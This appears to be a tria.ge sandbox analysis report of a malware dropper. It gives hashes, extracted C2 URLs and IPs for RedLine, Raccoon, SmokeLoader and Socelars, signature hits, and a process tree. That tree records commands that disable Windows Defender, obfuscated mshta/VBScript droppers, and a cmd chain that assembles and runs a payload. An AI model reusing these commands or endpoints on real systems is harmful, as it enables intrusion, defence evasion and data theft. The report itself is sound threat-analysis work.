Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
10cbf31d825a...d2.exe
windows10_x64
10db76a117db...12.exe
windows7_x64
10db76a117db...12.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows7_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10f2196668f4...cb.exe
windows7_x64
10f2196668f4...cb.exe
windows10_x64
10Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
33s -
max time network
171s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
08/11/2021, 14:48
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral3
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral5
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211104
Behavioral task
behavioral6
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211104
Behavioral task
behavioral9
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211014
Behavioral task
behavioral10
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211104
Behavioral task
behavioral11
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral12
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win7-en-20211104
Behavioral task
behavioral16
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-en-20211014
Behavioral task
behavioral17
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win7-en-20211104
Behavioral task
behavioral18
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-en-20211014
Behavioral task
behavioral19
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win7-en-20211104
Behavioral task
behavioral20
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-en-20211104
General
-
Target
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
-
Size
4.7MB
-
MD5
0cc50985a2e8ae4f126dabb4b6a1c2be
-
SHA1
4d20dd812a0b2d47f4b9b511538125a1ad5d917c
-
SHA256
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef
-
SHA512
9916db8f6dcc3532d3f205d3d96154cdb511ac3b135a874f72f47be251feeedc3a83b9304f132b1e680b48b2d820dd88a2692cc1080baf88be4ffcb45d2cc439
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
fucker2
135.181.129.119:4805
Extracted
raccoon
2f2ad1a1aa093c5a9d17040c8efd5650a99640b5
-
url4cnc
http://telegatt.top/oh12manymarty
http://telegka.top/oh12manymarty
http://telegin.top/oh12manymarty
https://t.me/oh12manymarty
Extracted
redline
Chris
194.104.136.5:46013
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4916 4796 rundll32.exe 125 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral4/memory/4060-276-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/4060-277-0x000000000041B23E-mapping.dmp family_redline behavioral4/memory/3376-290-0x000000000041B242-mapping.dmp family_redline behavioral4/memory/3376-287-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/4060-308-0x00000000055E0000-0x0000000005BE6000-memory.dmp family_redline behavioral4/memory/4180-311-0x000000000041B23E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000400000001ab9f-204.dat family_socelars behavioral4/files/0x000400000001ab9f-246.dat family_socelars -
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
resource yara_rule behavioral4/files/0x000400000001ab8e-122.dat aspack_v212_v242 behavioral4/files/0x000400000001ab8d-123.dat aspack_v212_v242 behavioral4/files/0x000400000001ab8e-125.dat aspack_v212_v242 behavioral4/files/0x000400000001ab8d-124.dat aspack_v212_v242 behavioral4/files/0x000400000001ab92-128.dat aspack_v212_v242 behavioral4/files/0x000400000001ab92-129.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
pid Process 8 setup_installer.exe 708 setup_install.exe 912 Tue19879c4c0e.exe 1280 Tue19325eb008c0b950.exe 1708 Tue195c40958f528163.exe 1868 Tue19c06f159e0ec.exe 1736 Tue19f51bcd77a.exe 1768 Tue1993b3f72c.exe 3984 Tue193858933525b62.exe 2140 Tue19150ee2be694c8a4.exe 2108 Tue192762f1cd058ddf8.exe 2960 Tue19411ac950924ec3f.exe 3168 Tue19879c4c0e.tmp 2676 Tue19c78ded4d176ac.exe 1716 Tue19c1338f41ab.exe 3996 Tue19761b3b8d9d.exe 1884 Tue19b4ef3b53293fe.exe 1156 Tue19879c4c0e.exe 3572 WerFault.exe 2956 Tue19879c4c0e.tmp -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 9 IoCs
pid Process 708 setup_install.exe 708 setup_install.exe 708 setup_install.exe 708 setup_install.exe 708 setup_install.exe 708 setup_install.exe 708 setup_install.exe 3168 Tue19879c4c0e.tmp 2956 Tue19879c4c0e.tmp -
resource yara_rule behavioral4/files/0x000400000001abc8-338.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ip-api.com 304 ipinfo.io 329 ipinfo.io 64 ipinfo.io 65 ipinfo.io 85 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 2540 708 WerFault.exe 69 2208 2108 WerFault.exe 94 5356 5932 WerFault.exe 169 5136 3536 WerFault.exe 182 3572 5396 WerFault.exe 200 -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4988 schtasks.exe 7484 schtasks.exe 7540 schtasks.exe 4748 schtasks.exe 1060 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4392 timeout.exe 4204 timeout.exe 8180 timeout.exe -
Kills process with taskkill 8 IoCs
pid Process 5952 taskkill.exe 4452 taskkill.exe 4536 taskkill.exe 4300 taskkill.exe 7900 taskkill.exe 8092 taskkill.exe 4224 taskkill.exe 8068 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 1344 powershell.exe 1344 powershell.exe 2384 powershell.exe 2384 powershell.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe 2540 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2676 Tue19c78ded4d176ac.exe Token: SeCreateTokenPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeAssignPrimaryTokenPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeLockMemoryPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeIncreaseQuotaPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeMachineAccountPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeTcbPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeSecurityPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeTakeOwnershipPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeLoadDriverPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeSystemProfilePrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeSystemtimePrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeProfSingleProcessPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeIncBasePriorityPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeCreatePagefilePrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeCreatePermanentPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeBackupPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeRestorePrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeShutdownPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeDebugPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeAuditPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeSystemEnvironmentPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeChangeNotifyPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeRemoteShutdownPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeUndockPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeSyncAgentPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeEnableDelegationPrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeManageVolumePrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeImpersonatePrivilege 1884 Tue19b4ef3b53293fe.exe Token: SeCreateGlobalPrivilege 1884 Tue19b4ef3b53293fe.exe Token: 31 1884 Tue19b4ef3b53293fe.exe Token: 32 1884 Tue19b4ef3b53293fe.exe Token: 33 1884 Tue19b4ef3b53293fe.exe Token: 34 1884 Tue19b4ef3b53293fe.exe Token: 35 1884 Tue19b4ef3b53293fe.exe Token: SeDebugPrivilege 2960 Tue19411ac950924ec3f.exe Token: SeRestorePrivilege 2540 WerFault.exe Token: SeBackupPrivilege 2540 WerFault.exe Token: SeDebugPrivilege 1344 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeDebugPrivilege 2540 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1592 wrote to memory of 8 1592 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 68 PID 1592 wrote to memory of 8 1592 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 68 PID 1592 wrote to memory of 8 1592 4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe 68 PID 8 wrote to memory of 708 8 setup_installer.exe 69 PID 8 wrote to memory of 708 8 setup_installer.exe 69 PID 8 wrote to memory of 708 8 setup_installer.exe 69 PID 708 wrote to memory of 2376 708 setup_install.exe 72 PID 708 wrote to memory of 2376 708 setup_install.exe 72 PID 708 wrote to memory of 2376 708 setup_install.exe 72 PID 708 wrote to memory of 2156 708 setup_install.exe 73 PID 708 wrote to memory of 2156 708 setup_install.exe 73 PID 708 wrote to memory of 2156 708 setup_install.exe 73 PID 708 wrote to memory of 1380 708 setup_install.exe 74 PID 708 wrote to memory of 1380 708 setup_install.exe 74 PID 708 wrote to memory of 1380 708 setup_install.exe 74 PID 708 wrote to memory of 612 708 setup_install.exe 75 PID 708 wrote to memory of 612 708 setup_install.exe 75 PID 708 wrote to memory of 612 708 setup_install.exe 75 PID 708 wrote to memory of 896 708 setup_install.exe 76 PID 708 wrote to memory of 896 708 setup_install.exe 76 PID 708 wrote to memory of 896 708 setup_install.exe 76 PID 708 wrote to memory of 688 708 setup_install.exe 77 PID 708 wrote to memory of 688 708 setup_install.exe 77 PID 708 wrote to memory of 688 708 setup_install.exe 77 PID 2376 wrote to memory of 2384 2376 cmd.exe 88 PID 2376 wrote to memory of 2384 2376 cmd.exe 88 PID 2376 wrote to memory of 2384 2376 cmd.exe 88 PID 708 wrote to memory of 1284 708 setup_install.exe 87 PID 708 wrote to memory of 1284 708 setup_install.exe 87 PID 708 wrote to memory of 1284 708 setup_install.exe 87 PID 708 wrote to memory of 3612 708 setup_install.exe 86 PID 708 wrote to memory of 3612 708 setup_install.exe 86 PID 708 wrote to memory of 3612 708 setup_install.exe 86 PID 2156 wrote to memory of 1344 2156 cmd.exe 85 PID 2156 wrote to memory of 1344 2156 cmd.exe 85 PID 2156 wrote to memory of 1344 2156 cmd.exe 85 PID 708 wrote to memory of 3472 708 setup_install.exe 78 PID 708 wrote to memory of 3472 708 setup_install.exe 78 PID 708 wrote to memory of 3472 708 setup_install.exe 78 PID 708 wrote to memory of 956 708 setup_install.exe 79 PID 708 wrote to memory of 956 708 setup_install.exe 79 PID 708 wrote to memory of 956 708 setup_install.exe 79 PID 1380 wrote to memory of 912 1380 cmd.exe 84 PID 1380 wrote to memory of 912 1380 cmd.exe 84 PID 1380 wrote to memory of 912 1380 cmd.exe 84 PID 708 wrote to memory of 2400 708 setup_install.exe 80 PID 708 wrote to memory of 2400 708 setup_install.exe 80 PID 708 wrote to memory of 2400 708 setup_install.exe 80 PID 612 wrote to memory of 1280 612 cmd.exe 83 PID 612 wrote to memory of 1280 612 cmd.exe 83 PID 612 wrote to memory of 1280 612 cmd.exe 83 PID 708 wrote to memory of 2328 708 setup_install.exe 82 PID 708 wrote to memory of 2328 708 setup_install.exe 82 PID 708 wrote to memory of 2328 708 setup_install.exe 82 PID 896 wrote to memory of 1708 896 cmd.exe 81 PID 896 wrote to memory of 1708 896 cmd.exe 81 PID 896 wrote to memory of 1708 896 cmd.exe 81 PID 1284 wrote to memory of 1868 1284 cmd.exe 92 PID 1284 wrote to memory of 1868 1284 cmd.exe 92 PID 1284 wrote to memory of 1868 1284 cmd.exe 92 PID 688 wrote to memory of 1736 688 cmd.exe 91 PID 688 wrote to memory of 1736 688 cmd.exe 91 PID 688 wrote to memory of 1736 688 cmd.exe 91 PID 3612 wrote to memory of 1768 3612 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8002A606\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19879c4c0e.exeTue19879c4c0e.exe5⤵
- Executes dropped EXE
PID:912 -
C:\Users\Admin\AppData\Local\Temp\is-OGOCR.tmp\Tue19879c4c0e.tmp"C:\Users\Admin\AppData\Local\Temp\is-OGOCR.tmp\Tue19879c4c0e.tmp" /SL5="$60174,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19879c4c0e.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3168 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19879c4c0e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19879c4c0e.exe" /SILENT7⤵
- Executes dropped EXE
PID:1156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe4⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Users\Admin\AppData\Local\Temp\7zS8002A606\Tue19325eb008c0b950.exeTue19325eb008c0b950.exe5⤵
- Executes dropped EXE
PID:1280 -
C:\Users\Admin\Pictures\Adobe Films\L4Blg30KbyeZpUV9xMkNALI6.exe"C:\Users\Admin\Pictures\Adobe Films\L4Blg30KbyeZpUV9xMkNALI6.exe"6⤵PID:4920
-
-
C:\Users\Admin\Pictures\Adobe Films\6jdjZ7kWplZ5ToDgXoNQyi0s.exe"C:\Users\Admin\Pictures\Adobe Films\6jdjZ7kWplZ5ToDgXoNQyi0s.exe"6⤵PID:5992
-
-
C:\Users\Admin\Pictures\Adobe Films\IAHfzLRbylhHaHsHcJFCiYR8.exe"C:\Users\Admin\Pictures\Adobe Films\IAHfzLRbylhHaHsHcJFCiYR8.exe"6⤵PID:5984
-
-
C:\Users\Admin\Pictures\Adobe Films\tBMQfIBVVkK4qrxwm9YKj75u.exe"C:\Users\Admin\Pictures\Adobe Films\tBMQfIBVVkK4qrxwm9YKj75u.exe"6⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"7⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"7⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵PID:5664
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:6936
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵PID:1196
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:7380
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:7736
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:5880
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:7680
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:6528
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:7900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵PID:5660
-
C:\Users\Admin\AppData\Local\6376921.exe"C:\Users\Admin\AppData\Local\6376921.exe"8⤵PID:5492
-
-
C:\Users\Admin\AppData\Local\6417369.exe"C:\Users\Admin\AppData\Local\6417369.exe"8⤵PID:2460
-
-
C:\Users\Admin\AppData\Local\2917304.exe"C:\Users\Admin\AppData\Local\2917304.exe"8⤵PID:1268
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\2917304.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\2917304.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))9⤵PID:7492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\2917304.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\2917304.exe" ) do taskkill -f -Im "%~NXZ"10⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i11⤵PID:2528
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))12⤵PID:7632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"13⤵PID:5500
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "2917304.exe"11⤵
- Kills process with taskkill
PID:5952
-
-
-
-
-
C:\Users\Admin\AppData\Local\8682351.exe"C:\Users\Admin\AppData\Local\8682351.exe"8⤵PID:4056
-
-
C:\Users\Admin\AppData\Local\917870.exe"C:\Users\Admin\AppData\Local\917870.exe"8⤵PID:7292
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:5692
-
C:\Users\Admin\AppData\Local\Temp\is-IQTAG.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IQTAG.tmp\setup.tmp" /SL5="$20306,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵PID:6340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:3588
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"7⤵PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:5316
-
